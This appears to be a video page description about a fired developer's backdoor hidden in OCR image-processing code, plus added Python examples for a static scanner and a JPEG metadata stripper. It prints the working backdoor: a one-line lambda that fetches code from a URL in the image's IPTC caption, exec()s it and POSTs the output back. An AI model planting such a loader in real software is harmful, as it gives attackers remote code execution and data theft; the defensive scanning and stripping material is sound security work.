log.084 Fired Employee Backdoor in OCR - SDLC CI how to protect yourself from malware in python

41,984 views

Jak zostać programistą

Published on Nov 28, 2024
About:

JPG attack, or the OCR department's wet dream. As a rule, for every matter we have to go to a bank branch to deliver documents such as a promissory note, PIT tax returns or statements, even for a mortgage on an apartment. Financial institutions are moving with the times and, as they close brick-and-mortar branches to save money, they are developing their online platforms. In online banking we can already submit many declarations by attaching a document scan as PDF, JPG or even TIFF. Companies love to collect data about us, and when receiving document scans it would be strange if they did not analyze the metadata of the graphic files. Files from a phone can contain GPS coordinates, which the Taliban in Afghanistan once got burned by. Scanner model, exposure time, etc. allow profiling the client: what system they use, and so on.

TL;DR at 9:07: A developer at an external company integrating OCR and pumping data into the innovative IBM technology on Java 1.6 was on his way out of the company and decided to play a trick on it. He placed a backdoor in the code. How is it possible that no static analysis (SAST, Static Application Security Testing) found it? There probably wasn't any, because that is cheaper. The client, however, still had its own automated tests, including feeding test scans through to check that texts were recognized correctly and that there was no regression. Unexpectedly, strange errors appeared in the logs:

    requests.exceptions.MissingSchema: Invalid URL 'The original photo of Kabosu that led to the meme': No scheme supplied. Perhaps you meant https://The original photo of Kabosu that led to the meme?

It turned out that the guy had hidden a loader which the endpoint reads from the EXIF/IPTC metadata of the JPG image; the test scan's caption field held ordinary text rather than a URL, so the request blew up. He probably did not want to hard-code the address in the code, which reduced the chance of detection.

    # The backdoor as shown in the video: the IPTC caption of the uploaded
    # image is treated as a URL, its body is fetched and exec()'d with stdout
    # captured, and the captured output is POSTed back to the same URL.
    (lambda d: requests.post(
        d['Iptc.Application2.Caption'][0],
        data=(lambda o: (
            setattr(sys, 'stdout', o),
            exec(requests.get(d['Iptc.Application2.Caption'][0]).text),
            setattr(sys, 'stdout', sys.__stdout__),
            o.getvalue()
        )[-1])(io.StringIO())
    ) if 'Iptc.Application2.Caption' in d else None)(iptc_data)
    return iptc_data

Of course, something like this can be found relatively quickly when reading the code. But here the second trick comes in: the guy pushed the whole thing far to the right, outside the visible editor area, and compressed it into a single lambda. Had the code been a bit more careful, with a try/except, a check that the value starts with http, and a less conspicuous field, it would have stood a good chance of going unnoticed. Maybe it was not about actually harming the end customer, but about spiting the employer so that he would not have the pleasure of letting such a potato go. The guy earned 4,000 gross on a UZ contract and after half a year did not get the promised raise, which had been promised to him if he did well. The moral is that a company which shamelessly skimps on an employee can expect surprises like this, and that is probably why some companies revoke all access on the very day of termination.

    exiv2 -pe image.jpg
    Exif.Image.ImageDescription   Ascii     29  http://192.168.0.161/portal/
    Exif.Image.Orientation        Short      1  1
    Exif.Image.XResolution        Rational   1  300/1
    Exif.Image.YResolution        Rational   1  300/1
    Exif.Image.ResolutionUnit     Short      1  2
    Exif.Image.Software           Ascii     15  GIMP 3.0.0-RC1
    Exif.Image.DateTime           Ascii     20  2024:11:28 06:57:49
    Exif.Image.ExifTag            Long       1  204
    Exif.Photo.ColorSpace         Short      1  1
    Exif.Image.GPSTag             Long       1  222
    Exif.GPSInfo.GPSAltitude      Rational   1  0/100

#python #hacking #pip #exif #jpg #programming
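The question of why no static analysis caught the lambda above is easier to answer with a concrete check in hand. The following is an added example, not code from the video or its author: a small Python scanner that parses a source file with the standard ast module and reports the three things visible in the snippet above, namely exec()/eval() calls, HTTP calls whose URL is not a string literal (here it comes out of the IPTC dictionary), and lines where code resumes after a long run of whitespace, the hidden-to-the-right trick. The sample source it scans is constructed for the example; parse_iptc() is a placeholder name that is never executed, only parsed.

```python
import ast
import re

# Constructed sample source for this example: a mock of the OCR helper the
# video describes, with the page's lambda pushed off-screen to the right after
# a semicolon. parse_iptc() is a placeholder; the text is parsed, never run.
SAMPLE_SOURCE = (
    "import io, sys, requests\n"
    "\n"
    "def read_iptc(path):\n"
    "    iptc_data = parse_iptc(path);"
    + " " * 200
    + "(lambda d: requests.post(d['Iptc.Application2.Caption'][0], data=(lambda o: "
    "(setattr(sys, 'stdout', o), exec(requests.get(d['Iptc.Application2.Caption'][0]).text), "
    "setattr(sys, 'stdout', sys.__stdout__), o.getvalue())[-1])(io.StringIO())) "
    "if 'Iptc.Application2.Caption' in d else None)(iptc_data)\n"
    "    return iptc_data\n"
    "\n"
    "def fetch_manifest():\n"
    "    return requests.get('https://example.invalid/manifest.json').text\n"
)

DANGEROUS_CALLS = {"exec", "eval", "compile", "__import__"}
NETWORK_PREFIXES = ("requests.", "httpx.", "urllib.request.")
# Non-blank, then at least 40 spaces/tabs, then more code on the same line.
HIDDEN_GAP = re.compile(r"\S[ \t]{40,}\S")


def _call_name(node):
    """Return 'exec' for exec(...) or 'requests.post' for requests.post(...)."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name) and parts:
        parts.append(func.id)
        return ".".join(reversed(parts))
    return None  # call on a lambda, a call result, etc.


def scan_source(source):
    """Return a list of (lineno, kind, detail) findings for one Python file."""
    findings = []
    # 1. Text-level check: code continuing after a long whitespace gap.
    for lineno, line in enumerate(source.splitlines(), 1):
        if HIDDEN_GAP.search(line):
            findings.append((lineno, "hidden-right",
                             "code continues after a long whitespace gap"))
    # 2. AST-level checks; ast.walk also descends into lambda bodies.
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name is None:
            continue
        if name in DANGEROUS_CALLS:
            findings.append((node.lineno, "dynamic-exec",
                             f"{name}() executes data as code"))
        elif (name.startswith(NETWORK_PREFIXES) or name.endswith("urlopen")) and node.args:
            url = node.args[0]
            if not isinstance(url, ast.Constant):
                findings.append((node.lineno, "data-driven-url",
                                 f"{name}() URL is not a literal: {ast.unparse(url)}"))
    return findings


if __name__ == "__main__":
    for lineno, kind, detail in scan_source(SAMPLE_SOURCE):
        print(f"line {lineno}: [{kind}] {detail}")
```

Run against the sample, every finding lands on line 4 (the off-screen lambda) and the honest requests.get() with a literal URL in fetch_manifest() is not reported; wiring a check like this into CI is cheap compared to the SAST suite the video suspects was never bought.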
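The other half of the defence is never letting uploaded metadata reach the OCR code in the first place: an intake step that drops the EXIF (APP1) and IPTC/Photoshop (APP13) segments from a JPG before anything parses them, which also removes the GPS coordinates and scanner details mentioned at the top. Below is an added example in pure Python, not the bank's or the author's code, that walks the JPEG marker structure and rebuilds the file without those segments. The sample JPEG is constructed inline (structurally valid for a marker-level parser, not a viewable image), and its metadata payloads carry the URL from the exiv2 listing above as a stand-in for the caption the backdoor read; the IPTC record inside is a rough stub, not a complete dataset.

```python
SOI, EOI, SOS = 0xD8, 0xD9, 0xDA
# Markers that carry no length field: TEM, RST0-7, SOI, EOI.
STANDALONE = {0x01, *range(0xD0, 0xD8), SOI, EOI}


def iter_segments(jpeg):
    """Yield (marker, offset, size) for each segment after SOI, up to and
    including SOS. Entropy-coded data after SOS is not parsed."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos < len(jpeg):
        start = pos
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected 0xFF marker prefix at offset {pos}")
        while pos < len(jpeg) and jpeg[pos] == 0xFF:  # 0xFF fill bytes are allowed
            pos += 1
        if pos >= len(jpeg):
            raise ValueError("truncated marker")
        marker = jpeg[pos]
        pos += 1
        if marker in STANDALONE:
            yield marker, start, pos - start
            continue
        if pos + 2 > len(jpeg):
            raise ValueError("truncated segment length")
        length = int.from_bytes(jpeg[pos:pos + 2], "big")  # includes the 2 length bytes
        if length < 2 or pos + length > len(jpeg):
            raise ValueError(f"bad segment length {length} at offset {pos}")
        pos += length
        yield marker, start, pos - start
        if marker == SOS:
            return


def list_segments(jpeg):
    """Marker codes in file order, handy for before/after comparison."""
    return [marker for marker, _, _ in iter_segments(jpeg)]


def strip_metadata(jpeg, drop=(0xE1, 0xED)):
    """Rebuild the JPEG without the given APPn segments (default: APP1 Exif/XMP
    and APP13 Photoshop/IPTC). Everything from SOS onward is copied verbatim."""
    out = bytearray(b"\xff\xd8")
    end = 2
    for marker, start, size in iter_segments(jpeg):
        end = start + size
        if marker in drop:
            continue
        out += jpeg[start:end]
    out += jpeg[end:]
    return bytes(out)


def _segment(marker, payload):
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload


# Constructed minimal JPEG: the APP1/APP13 payloads carry the URL from the
# video's exiv2 listing as the "caption" a metadata-driven loader would read.
_URL = b"http://192.168.0.161/portal/"
SAMPLE_JPEG = (
    b"\xff\xd8"
    + _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    + _segment(0xE1, b"Exif\x00\x00MM\x00\x2a\x00\x00\x00\x08" + _URL)
    + _segment(0xED, b"Photoshop 3.0\x008BIM\x04\x04"
               + b"\x1c\x02\x78" + len(_URL).to_bytes(2, "big") + _URL)  # stub IPTC 2:120
    + _segment(0xDB, b"\x00" + bytes(64))            # quantisation table
    + _segment(0xDA, b"\x01\x01\x00\x00\x3f\x00")    # start of scan
    + b"\x12\x34\xff\x00\x56"                          # fake scan data with stuffed 0xFF00
    + b"\xff\xd9"
)

if __name__ == "__main__":
    print("before:", [hex(m) for m in list_segments(SAMPLE_JPEG)])
    cleaned = strip_metadata(SAMPLE_JPEG)
    print("after: ", [hex(m) for m in list_segments(cleaned)])
    print("url survives:", _URL in cleaned)
```

Keeping APP0 (JFIF) and APP14 (Adobe) untouched matters because decoders use them for colour handling; the default drop list only removes the segments that carry free-text fields such as ImageDescription and the IPTC caption, which is exactly where the video's loader found its address.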


fetery.com. Copyright 2024